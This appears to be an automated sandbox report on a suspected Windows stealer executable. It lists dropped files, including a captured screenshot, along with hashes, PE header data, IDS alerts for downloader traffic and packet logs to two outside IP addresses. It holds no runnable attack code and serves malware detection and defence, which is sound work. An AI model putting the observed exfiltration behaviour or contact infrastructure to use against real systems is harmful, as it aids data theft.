Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.242990426783058
Encrypted:	false
SSDEEP:	6:kKMO9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:0xDImsLNkPlE99SNxAhUe/3
MD5:	57B0716BD6AA45FB2F843355E03433C1
SHA1:	A102AD12E01609653CC967AF01326E4B78530DB6
SHA-256:	EB331CB16C9625CFE9C41D9D3BACD8124A31410CCF5218C109E1935CFE2F4669
SHA-512:	5462550E32D97E7A26B45152516692AAA0FBFCB90AF6B1C1B99EC737A424D13C7686F3AFECC4470A99B7069E35C9F3FB129EAA0471F8B838694F196F61720F31
Malicious:	false
Reputation:	low
Preview:	p...... .........q..l-..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VbcXXnmIwPPhh.exe.log

Download File

Process:	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380805901110357
Encrypted:	false
SSDEEP:	48:lylWSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCZfIfSKRHmOugw1s
MD5:	A6C11D5EB8FF113F746691904CC1C285
SHA1:	85159530ED2933460F7D0793776D5FC2B1FAE500
SHA-256:	7C1AA4858AF77BB1C1ADA78CE4816C4178A74E0A9CCFDB1E7F6A6FA3A08D6A1B
SHA-512:	3460404875D62BD2318704741E443A0EF38352E977EEEE5EC7C39E6FCE9596D7E0F0A401780993697AE21FB68E2B9A9AF3A662667FB9EA48D7DD8E5B6148AF1E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xqyadvx.hmn.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gc3jpauf.ryz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lj0wzbyw.y3g.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mljpq4ed.5sw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\Documents\VIPRecovery\Screenshot.png

Download File

Process:	C:\Users\user\Desktop\VbcXXnmIwPPhh.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	675088
Entropy (8bit):	7.923743581618393
Encrypted:	false
SSDEEP:	12288:t88mOMR4QeEwWbt2oBcM4fk3spK2FvBq5CbS1juVBYDQThFxB4gSB:+HRN2OBcMmk3sgGvBECbS1amkThg
MD5:	C692A68EC39263ED62B3F3419039DC4C
SHA1:	98DEF8045A3E691CF90076CF424BD8C981CC7112
SHA-256:	63E470BBC6003996282D5706651491AA45E2F32A1C9852461343B3CCBDA64E52
SHA-512:	2EB2613A4E78B5DB9523980025757331297FA210E7486FEC810BD29BB80D74A89B354D3C85D5721B1C055423DC3C9F3E3948B0ECB5B7FC54D589E74BB4B58FF7
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....].u.s.UKjT.U......o.....\|......I....F.qo'.{..G...o...n0..... .N4.....B..6.z....;.s..s%..1~c.5.\.{Eb..s..h..Z.,.....[.GQ...l.H...qN.........8+.......fd(.... ..3-Cg......8}]..b.@..J..h..r_.......M../mR...t..Ibm[.'.s.0t..i...#C..4.]].ml.4.y.+...?.....Q/...w..X...@i~....h~ke.4...b..+..7V....g.2.5..wA...q0...+...T.\|..q.....b....O..e8c...-.\|...v..\...g....L{F>..W..>.H[.?.3....(...C-....#..Fk..54....k-.z.0...F...+.?...l..w_h..,L.......0\|.}...,K#1;W...G2..:..3........zO.....p.k.P...R0rh.G.\|$.U.Zyh~...C..S....0..x..K....J0.S.w..)..bS..;L.p.9(......,.Cs.......~........cZ.....tO..k..q..X.8..8o.sg....4.].F.....C.F.[.....-a=.o..(....*6..{...qnk..............4.....>w$..^..{.^.....?+..=oKuS.[...7~n..e$F~Z.Y.....w.Qk.F..........k ..1.G.G4........55....w_........5~......[.\|....F.5g.R.m.9L.-.k...8m..g.....Q..n.[....qNLu.8y 7}..;.1[...........M).Z}..EN..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.870849196017935
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	VbcXXnmIwPPhh.exe
File size:	684'032 bytes
MD5:	401098a467fc699acb2d256da47fdace
SHA1:	87484e36df3eb0290178e4ab85b5566fb6f92b16
SHA256:	c803bffcf528efc9a204a34a6a9285128f9dce25d165020fc37198d16ee50c11
SHA512:	98904310b81ca4bf690492caa067245cf41f9c9a9d2f2b3ec93a0c930cfa8ac4bb8b6de4a9f38e9bd62de1ffc85bba7d9a9b4b40132b86857a8233c2e0f96aac
SSDEEP:	12288:nPedfckNyIN2PB2Qig51Sz4uRhCMrFClQSzdtTJ:nPYUUnopfN4UGHrqD
TLSH:	92E4124A65A9C907C4EB9BF80031E2B553728DDA7612D213BFEA7CFBB82D7011845793
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O.................0..f............... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4a85aa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xF6BE9C4F [Tue Mar 8 01:03:11 2101 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa8557	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaa000	0x5bc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xac000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xa6ef0	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa65b0	0xa6600	74101145659a37c0428c259166193341	False	0.9416116876408716	data	7.877925712281058	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xaa000	0x5bc	0x600	85186c15e60a206ef9e8f402c90883b2	False	0.4231770833333333	data	4.11100015095948	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xac000	0xc	0x200	3e971e16526c5c06e8eca47faedd85f9	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xaa090	0x32c	data			0.42857142857142855
RT_MANIFEST	0xaa3cc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T13:44:08.575080+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49701	132.226.8.169	80	TCP
2024-09-26T13:44:10.278251+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49701	132.226.8.169	80	TCP
2024-09-26T13:44:11.001792+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49706	188.114.96.3	443	TCP
2024-09-26T13:44:12.434480+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49707	132.226.8.169	80	TCP
2024-09-26T13:44:13.000341+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49708	188.114.96.3	443	TCP
2024-09-26T13:44:16.852101+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49712	188.114.96.3	443	TCP
2024-09-26T13:44:18.300570+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49715	188.114.96.3	443	TCP
2024-09-26T13:44:23.107514+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49725	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 13:44:04.826493025 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:04.831465960 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:04.831540108 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:04.831887960 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:04.836726904 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:08.174153090 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:08.179656029 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:08.184556007 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:08.521030903 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:08.575079918 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:08.576369047 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:08.576411963 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:08.576483011 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:08.583803892 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:08.583820105 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:09.071254015 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:09.071423054 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:09.078681946 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:09.078705072 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:09.079016924 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:09.122016907 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:09.137556076 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:09.179400921 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:09.255094051 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:09.255182981 CEST	443	49705	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:09.255815029 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:09.262037992 CEST	49705	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:09.271049976 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:09.275959969 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:10.228789091 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:10.234520912 CEST	49706	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:10.234579086 CEST	443	49706	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:10.234663010 CEST	49706	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:10.235229015 CEST	49706	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:10.235244036 CEST	443	49706	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:10.278250933 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:10.853518009 CEST	443	49706	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:10.860184908 CEST	49706	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:10.860222101 CEST	443	49706	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:11.001802921 CEST	443	49706	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:11.001893044 CEST	443	49706	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:11.002060890 CEST	49706	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:11.002883911 CEST	49706	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:11.007371902 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:11.008780956 CEST	49707	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:11.012877941 CEST	80	49701	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:11.013605118 CEST	49701	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:11.013627052 CEST	80	49707	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:11.014084101 CEST	49707	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:11.014173031 CEST	49707	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:11.018944979 CEST	80	49707	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:12.383827925 CEST	80	49707	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:12.385116100 CEST	49708	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:12.385154963 CEST	443	49708	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:12.385246992 CEST	49708	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:12.385539055 CEST	49708	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:12.385550976 CEST	443	49708	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:12.434479952 CEST	49707	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:12.859292030 CEST	443	49708	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:12.861061096 CEST	49708	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:12.861076117 CEST	443	49708	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:13.000350952 CEST	443	49708	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:13.000447989 CEST	443	49708	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:13.000545979 CEST	49708	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:13.001065969 CEST	49708	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:13.005754948 CEST	49709	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:13.010628939 CEST	80	49709	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:13.010751009 CEST	49709	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:13.010843992 CEST	49709	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:13.015666962 CEST	80	49709	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:14.390242100 CEST	80	49709	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:14.390527964 CEST	80	49709	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:14.390611887 CEST	49709	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:14.391753912 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:14.391819000 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:14.391910076 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:14.392165899 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:14.392198086 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:14.922988892 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:14.924832106 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:14.924873114 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:15.072851896 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:15.072951078 CEST	443	49710	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:15.073010921 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:15.073530912 CEST	49710	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:15.077003956 CEST	49709	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:15.078044891 CEST	49711	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:15.082122087 CEST	80	49709	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:15.082315922 CEST	49709	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:15.082854986 CEST	80	49711	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:15.082926989 CEST	49711	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:15.083157063 CEST	49711	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:15.087971926 CEST	80	49711	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:15.913089037 CEST	80	49711	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:15.914896011 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:15.914947987 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:15.915008068 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:15.915452957 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:15.915467978 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:15.965811014 CEST	49711	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:16.693789959 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:16.695713043 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:16.695746899 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:16.852103949 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:16.852204084 CEST	443	49712	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:16.852267027 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:16.852878094 CEST	49712	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:16.856240988 CEST	49711	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:16.857526064 CEST	49713	80	192.168.2.7	132.226.8.169
